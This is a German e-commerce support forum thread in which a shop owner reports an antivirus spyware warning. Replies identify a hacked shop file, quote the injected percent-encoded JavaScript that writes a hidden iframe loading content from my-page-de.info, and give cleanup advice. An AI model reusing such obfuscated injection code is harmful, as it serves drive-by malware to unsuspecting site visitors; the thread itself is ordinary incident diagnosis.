#1 (permalink)  
Alt 19.08.2008, 06:58
Neuer Benutzer
 
Registriert seit: 04.08.2008
Beiträge: 1
Standard trendmicro sicherheitswarnung my-page-de.info

Hallo,

wenn ein User mit dem aktuellen Trendmicro auf meinen neuen Shop
** url entfernt *** geht, erhält er die Warnungmeldung das hier
versucht wird Spyware auf seinen rechner zu laden. Und Sie empfehlen
die Webseite nicht zu öffnen. Wer hat das selbige Problem? Wer kann helfen?
Grafiken im Anhang

Besten Dank im Voraus.

gruß

Sascha
Angehängte Grafiken
Dateityp: jpg image001.jpg (20,0 KB, 12x aufgerufen)
Dateityp: jpg image002.jpg (20,0 KB, 9x aufgerufen)

Geändert von mzanier (19.08.2008 um 07:30 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 19.08.2008, 07:22
Benutzerbild von mzanier
xt:Commerce GmbH, Geschäftsführung
 
Registriert seit: 18.04.2003
Beiträge: 27.414
Standard

da hat wohl jemand deinen webspace gehackt, denn anscheinend wurde hier einie datei des shops modifiziert und das eingefügt:

Zitat:
<Script>
......"%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b% 5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69 %20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%6 5%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79% 54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29 %2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3 d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65% 6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69 %66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%6 5%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d% 3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79 %6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%2 7%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77% 69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68% 74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d% 27%63%34%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74 %4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%2 8%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d% 7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b %0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2 e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e% 61%6d%65%3d%63%34%20%73%72%63%3d%5c%27%68%74%74%70 %3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%6 6%6f%2f%69%6e%2e%63%67%69%3f%39&%27%2b%4d%61%74%68 %2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6 f%6d%28%29%2a%32%31%39%38%34%29%2b%27%32%30%61%64% 37%33%35%64%32%32%32%5c%27%20%77%69%64%74%68%3d%34 %38%20%68%65%69%67%68%74%3d%34%35%38%20%73%74%79%6 c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e% 65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b %7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b..... .
</Script>
was vermutlich ein iframe sein wird welches eine infizierte datei lädt.
__________________
xt:Commerce Helpdesk
xt:Commerce Blog

xt:Commerce Warenwirtschaft

###

Offene Stellen bei xt:Commerce!
xt:Commerce stellt ein
###

Geändert von mzanier (19.08.2008 um 07:31 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #3 (permalink)  
Alt 19.08.2008, 08:46
Erfahrener Benutzer
 
Registriert seit: 08.03.2005
Ort: Mußtopp
Beiträge: 638
Standard

Recht hat er. Ist'n kleines Javascript welches ein unsichtbares iframe von der, in der Warnmeldung, angegebenen Adresse nachlädt.

Ich würd' kein Risiko eingehen was in deinem Shop noch so alles manipuliert ist. Passworte ändern, Hoster informieren. Manipulierte Shopdateien+Datenbank runterkopieren und sichern (man weiß ja nie ob mans noch braucht) und vollständig neu aufspielen.


mfg
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
mypagedeinfo, sicherheitswarnung, trendmicro

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus



Alle Zeitangaben in WEZ +1. Es ist jetzt 15:26 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand